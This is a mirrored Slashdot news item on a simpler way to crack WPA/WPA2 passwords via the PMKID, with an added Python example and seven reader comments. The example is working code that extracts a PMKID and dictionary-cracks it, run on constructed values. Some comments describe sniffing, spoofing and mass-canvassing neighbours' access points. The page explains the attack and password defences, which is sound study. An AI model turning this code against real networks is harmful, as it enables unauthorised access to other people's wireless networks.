Slashdot Mirror


Hashcat Developer Discovers Simpler Way To Crack WPA2 Wireless Passwords (hashcat.net)

New submitter Woodmeister shares a report: While looking for ways to attack the new WPA3 security standard, Hashcat developer Jens "Atom" Steube found a simpler way to capture and crack access credentials protecting WPA and WPA2 wireless networks. The attacker needs to capture a single EAPOL frame after requesting it from the access point, extract the PMKID from it by dumping the received frame to a file, convert the captured data to a hash format accepted by Hashcat, and run Hashcat to crack it. Once that's done, the attacker has the Pre-Shared Key (PSK), i.e. the password, of the wireless network. Depending on the length and complexity of the password and the power of the cracking rig, that last step could take hours or days. "The main difference from existing attacks is that in this attack, capture of a full EAPOL 4-way handshake is not required. The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame," Steube explained. This makes the attack much easier to pull off, as the attacker no longer depends on another user, or on being in range of both the user and the access point at the exact moment when the user connects to the wireless network and the handshake takes place.
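The following is an added worked example, not code from the article or from hashcat, showing why one frame from the access point is enough. In WPA/WPA2-PSK the PMK is PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes), and the PMKID the AP sends in the first EAPOL-Key message is HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA): it depends only on the PSK, the SSID and the two MAC addresses, with no nonces from a connecting client. On the wire the PMKID sits in the Key Data field as a PMKID KDE (element 0xdd, OUI 00:0f:ac, data type 4), which the article's description refers to as the RSN IE. The SSID, passphrase, MAC addresses and wordlist below are constructed; the output line follows the `PMKID*MAC_AP*MAC_STA*ESSID(hex)` layout hashcat published for this attack, and the helper names are this example's own.

```python
# Added example, not from the article or hashcat: the PMKID computation the
# attack relies on, a walker over EAPOL-Key Key Data that pulls the PMKID out,
# the hashcat-style line it is converted to, and an offline dictionary crack of
# that line. All MACs, SSID, passphrase and wordlist are constructed.
import hashlib
import hmac
from typing import List, Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid_from_pmk(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """IEEE 802.11i: PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA).
    No nonces are involved, which is why a single frame from the AP suffices."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def extract_pmkid(key_data: bytes) -> Optional[bytes]:
    """Walk the elements in an EAPOL-Key Key Data field and return the PMKID
    from the PMKID KDE (element 0xdd, OUI 00:0f:ac, data type 4), or None."""
    i = 0
    while i + 2 <= len(key_data):
        eid, length = key_data[i], key_data[i + 1]
        body = key_data[i + 2 : i + 2 + length]
        if len(body) != length:
            return None  # truncated element: do not guess
        if eid == 0xDD and length == 20 and body[:4] == b"\x00\x0f\xac\x04":
            return body[4:]
        i += 2 + length
    return None


def to_hashcat_line(pmkid: bytes, mac_ap: bytes, mac_sta: bytes, ssid: str) -> str:
    """PMKID*MAC_AP*MAC_STA*ESSID(hex), the layout hashcat published for this attack."""
    return "*".join([pmkid.hex(), mac_ap.hex(), mac_sta.hex(), ssid.encode().hex()])


def crack_pmkid_line(line: str, wordlist: List[str]) -> Optional[str]:
    """Offline dictionary attack: one PBKDF2 (4096 rounds) plus one HMAC per candidate."""
    pmkid_hex, ap_hex, sta_hex, ssid_hex = line.strip().split("*")
    target = bytes.fromhex(pmkid_hex)
    mac_ap, mac_sta = bytes.fromhex(ap_hex), bytes.fromhex(sta_hex)
    ssid = bytes.fromhex(ssid_hex).decode()
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:
            continue  # WPA passphrases are 8..63 characters; skip impossible candidates
        guess = pmkid_from_pmk(pmk_from_passphrase(candidate, ssid), mac_ap, mac_sta)
        if hmac.compare_digest(guess, target):
            return candidate
    return None


# --- constructed sample: what the AP would put into message 1 of the handshake ---
SSID = "ExampleNet"
PASSPHRASE = "sunflower2018"            # the secret the attacker is after
MAC_AP = bytes.fromhex("020000000001")  # locally administered, constructed
MAC_STA = bytes.fromhex("020000000002")
WORDLIST = ["password", "letmein", "sunflower2018", "correct horse battery"]


def build_sample_key_data() -> bytes:
    """An RSN IE (skipped by the walker) followed by the PMKID KDE."""
    pmkid = pmkid_from_pmk(pmk_from_passphrase(PASSPHRASE, SSID), MAC_AP, MAC_STA)
    rsn_ie = bytes.fromhex(
        "30 14 01 00 000fac04 0100 000fac04 0100 000fac02 0000".replace(" ", "")
    )
    return rsn_ie + b"\xdd\x14\x00\x0f\xac\x04" + pmkid


def main() -> None:
    key_data = build_sample_key_data()
    pmkid = extract_pmkid(key_data)
    line = to_hashcat_line(pmkid, MAC_AP, MAC_STA, SSID)
    print("hashcat line:", line)
    print("recovered PSK:", crack_pmkid_line(line, WORDLIST))


if __name__ == "__main__":
    main()
```

Two practical points follow from the code. First, the shortcut is only in the capture: if the AP does not put a PMKID KDE into its first message, `extract_pmkid` returns None and the attacker is back to waiting for a full handshake. Second, the cost of the offline step is unchanged, since every candidate still costs 4096 PBKDF2 rounds salted with the SSID; what the attack removes is the need for a client, not the work per guess, so a long random PSK like the one suggested in the comments below still holds up.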

7 of 150 comments

  1. Use good passwords by dlakelan · · Score: 4, Insightful

    A good password for wifi, since it doesn't really need to be memorized, is one generated by something like keepass2: 15 characters long random letters numbers and punctuation:

    DHDukBDL04Pt2ZT

    for example (note that is not a password I use, just one I randomly generated).

    Since no-one actually has to type this in more than once per device, it's really not a major problem that you can't memorize it.

    --
    ((lambda (x) (x x)) (lambda (x) (x x))) http://www.endpointcomputing.com a scientific approach to custom computing.
    1. Re:Use good passwords by Anonymous Coward · · Score: 2, Insightful

      I sniff those too. Easy enough to spoof. Sometimes I have to wait for the impersonated device to be offline. Depends on the AP and the device.

    2. Re:Use good passwords by skoskav · · Score: 3, Insightful

      You clearly never have guests over.

    3. Re: Use good passwords by c6gunner · · Score: 4, Insightful

      That's what a guest network is for. Enable it when they show up, disable it when they go away.

    4. Re:Use good passwords by hawguy · · Score: 4, Insightful

      A good password for wifi, since it doesn't really need to be memorized, is one generated by something like keepass2: 15 characters long random letters numbers and punctuation:

      DHDukBDL04Pt2ZT

      for example (note that is not a password I use, just one I randomly generated).

      Since no-one actually has to type this in more than once per device, it's really not a major problem that you can't memorize it.

      It may not need to be memorized, but it does need to be typed into every Wifi device you own, sometimes through a clunky on screen or "scroll through the letters" LCD interface. So random string passwords are annoying enough that many people avoid them.

    5. Re: Use good passwords by Anonymous Coward · · Score: 3, Insightful

      might as well use ethernet, or tin cans with a string...

      R O

  2. Re:Bypassing login password by booting a different by Anonymous Coward · · Score: 3, Insightful

    You don't seem to understand this attack at all. It makes it possible to precompute the password to a WPA2-PSK network without having to wait for a valid client to authenticate against the network in the first place.

    So you can just walk around an apartment block with your phone asking each AP for the needed packet. Go back home, crack it all offline and come back doing automated attacks on every network. Each visit takes a few minutes instead of having to wait for a valid authorized client for each network. Can be dronified of course for extra flair.

    This breaks WPA2-PSK by making attacks trivial to do. I wonder how the Enterprise versions hold up.